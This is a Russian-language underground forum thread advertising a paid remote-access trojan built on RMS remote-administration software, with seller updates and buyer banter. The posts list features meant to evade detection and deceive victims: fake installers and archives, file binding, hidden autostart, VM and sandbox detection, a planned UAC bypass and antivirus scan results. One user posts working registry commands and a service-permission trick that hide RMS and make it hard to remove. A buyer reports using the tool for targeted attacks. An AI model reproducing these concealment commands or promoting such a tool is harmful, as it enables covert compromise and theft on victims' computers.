RMS Builder (RAT)

[Det]

А как тогда можно верить тому кто даже депозит не внес на форуме и хочет продавать софт и говорить что он супер и т.д.
А может ты тогда скан rutserv и rfusclient покажешь в студию а не оболочку как все!

 

[Nokia3310]

лучше 1 раз увидеть чем услышать в курсе да
Этот клоун прилетел в мой топик и поднял панику как так конкурент пришёл хотя у тебя тоже нет депозита я через гарант без б и работу лодыря покажу а ты пиздуй отсюда псевдоговнопабликкодерСгитхаба

Депозит есть на экспе.
В своём топике ты и без меня показал, чего стоишь ты и твой продукт, вместе с видео на ютубе. Иди криптуй через ресурс хакера.
И не бойся, я не считаю тебя за конкурента.
Нормальным покупателям я выдаю тест и они сами решают, стоит оно того или не стоит. А не показываю сказочные видео, где в тепличных условиях что-то приходит на почту.

 

[Nokia3310]

А как тогда можно верить тому кто даже депозит не внес на форуме и хочет продавать софт и говорить что он супер и т.д.

У тебя есть сомнения в форуме экспа?

А может ты тогда скан rutserv и rfusclient покажешь в студию а не оболочку как все!

Серьезно? Какая оболочка, это рантайм скан...
Идите учить матчасть, придете - расскажите.
Или закидывайте депозит в гарант, я вам все покажу.

 

[heybabyone]

А как тогда можно верить тому кто даже депозит не внес на форуме и хочет продавать софт и говорить что он супер и т.д.
А может ты тогда скан rutserv и rfusclient покажешь в студию а не оболочку как все!

на экспе тс внес. + общались с тс там же, а так шарит в своем направлении, у меня лично сомнений нет

 

[Cam_no_cebe]

на экспе тс внес. + общались с тс там же, а так шарит в своем направлении, у меня лично сомнений нет

ты сначала купи этот продукт а потом говори. я повторяю этот софт 500 баксов не стоит! скорости нету, а чтобы была нужно поднимать свой сервак и поднимтаь нужно самому т.к автор то незнает. да и еще минусы есть

 

[Nokia3310]

ты сначала купи этот продукт а потом говори. я повторяю этот софт 500 баксов не стоит! скорости нету, а чтобы была нужно поднимать свой сервак и поднимтаь нужно самому т.к автор то незнает. да и еще минусы есть

1) Технические ограничения софта, его минусы или плюсы обусловлены компанией разработчиком. Любой может скачать софт у компании и протестировать его, чтобы оценить скорость(ну и вообще, она средняя, а не медленная, так же, там есть настройка качества изображения, вы можете попробовать поменять его, вдруг автоматика вам HD настроила).
2) Поднять сервер не сложно, но я этим не занимаюсь. Это все равно, что настройка обычного РАТ, достаточно иметь чистый ИП и открыть порты. То есть принципиальной проблемы или сложности в этом нет.

 

[Nokia3310]

Мелкие обновления.
Актуально, работаем

 

[BaPaTok]

Помню времена тоже из rms sfx бэкдоры мутил, после распаковки архива и перед запуском службы, мой инсталлер батник прописывал значение в реестр:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfusclient.exe" /v Debugger /t REG_SZ /d "\"%windir%\system32\svchost.exe\""  /f
reg delete "HKLM\SOFTWARE\Classes\Installer\Products\DE7B04A8ACEEB93458B017FD79403E27" /v ProductName /f

Это удаляет палевную иконку на любой версии RMS из панели задач винды и название проги в установка и удаление программ. Еще цеплял отдельный файлик .reg добавлял в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RManService\Security значения в hex формате для изменения displayname службы и права только чтение юзерам и админам, таким образом удалить и остановить службу РМС можно было только из под систем акка. Из минусов, в таком виде не работает только viewer, а rdp, удаленная консоль и передача файлов все ок, а мне кроме консоли ничего и не надо было. Но теперь для меня rms это прошлый веk. ? В общем, желаю удачи в продаже!

 

[Nokia3310]

Report #a9ad20fe1fb6661389f57bb3a2ac1ddb | Dyncheck.com

dyncheck.com

Актуальный скан для РАТ без автозагрузки

За WebRoot не ручаюсь, но конкретно здесь он палит KMSSS(видимо, утилита динчека)

 

[Nokia3310]

Обновление.
Добавлена функция фейкового MsgBox.
Добавлена функция фейкового архива. (просмотр 7зип)
Добавлена функция склейки до 3 файлов. Имеется возможность фейкового архива показывать только склеенные файлы.
Улучшена логика автозагрузки(если админ права есть - скрытая, если нет - простая)
Добавлены несколько мелких функций: выполнение cmd-команды, киллпроц, удаление указанного файла.
Интерфейсное изменение, для удобства функции рассортированы по назначению.
Теперь количество вложенных ID не ограничено.

 

[rublefarm]

Написал в жабе, готов купить! Жду, спасибо

 

[Nokia3310]

Внимание!

Вчера официальный сервер TektonIT, связь с ботами через который была у 95% покупателей, включил скрытый "протокол" по которому все "пиратские" модификации перестали поддерживаться. Онлайн они отображаются, но подключение к ним полностью ограничено.

Извечный вопрос "Кто виноват и что делать?"

К сожалению, о таком риске клиенты не были уведомлены. Хотя этого нельзя было полностью исключать. Немного ранее, на сколько мне известно, подобная ситуация произошла с тимвивером. Вероятно, теперь боты, доступ к которым ограничен, потеряны. Возможно, через пару месяцев или больше, протокол на сервере будет отключен, но количество и актуальность ботов сильно пострадают.

Что делать? На самом деле, для последующего использования продукта это не представляет сильных препятствий, поскольку боты, закрепленные с помощью собственного mini-id сервера продолжают отлично работать. Мне жаль, что мои клиенты пострадали. Со своей стороны, я могу лишь помочь с настройкой mini-id сервера. Для этого требуется лишь белый IP и немного повозиться. Качество продукта от этого только возрастет за счет скорости передачи.

Если у вас есть "важные" боты(не больше 10), альтернативного доступа к которым нет, вы можете написать на почту поддержки компании support@tektonit.com с этой проблемой, после чего попытаться "убедить" ее в своей легальности. Но вероятность этого мала, а в случае неудачи информация может быть предоставлена уполномоченным службам.

Клиенты, которым нужна помощь в настройке mini-ID сервера, могут обратиться ко мне по любым контактам, с которыми они со мной связывались.

 

[Nokia3310]

Обновление.
Вышел билдер v3, было внесено множество небольших изменений в логику работы. Почищен.
Добавлено множество новых опциональных методов детектирования VM по различным признакам. Добавление новых методов так же сейчас в приоритете.

Новым клиентам доступна версия хоста RMS 7.0. Для старых придется доплатить(250$).

Обновлен список шаблонов для рандомизации, добавлена возможность самим добавлять слова в шаблоны. Оптимизация и увеличение рандомизации так же в приоритете.
Добавлена функция фейкового инсталлятора. При детекте VM будет так же запущен фейковый инсталлятор с установкой легитимной программы.

Из наиболее важного, отныне клиенты будут получать не билдер, а ребилды по запросу(при детекте виндефом или изменении настроек, не чаще раза в неделю)
Так как функций стало слишком много, это позволит исключить ненужные вопросы по функциям и их совместимости, выбрать наиболее оптимальные варианты.

 

[Nokia3310]

Обновление. Теперь билд умеет взаимодействовать с параметрами командной строки для более удобной пост-эксплуатации, то есть уже после заражения системы для вызова нужных функций билда в ручном режиме.

- Добавление РМС в автозагрузку
- Установка модуля РДП
- Удаление РМС
- Самоудаление билда

В дальнейшем добавится:
- Переустановить РМС или установить модуль РДП с BypassUAC(win10)
- Переустановить РМС или установить модуль РДП с вызовом циклического запроса UAC
- Установить РМС как службу(с запросом UAC, с циклическим UAC, c BypassUAC)
- Восстановление файлов РМС в случае удаления, с выбором автозагрузки
- И другие

Функция пока что действует в бета-режиме.

Частично изменена логика и структура кода. Улучшены способы проверки на сандбокс, антивм
Добавлен так же универсальный деинсталлятор РМС.

 

[mossoll]

Приобрел данный продукт для точечных атак.
Полностью доволен, рекомендую

 

[m0dHEX]

А так же, есть ман на одном хакблоге. Сборка подобно rms (teamviewer) на С++, значит от туда ты стянул концепцию. За что 400$?)))

А кинь ссылку в лс))

 

[DaVinci]

Проект живой ? скинь контакты в PM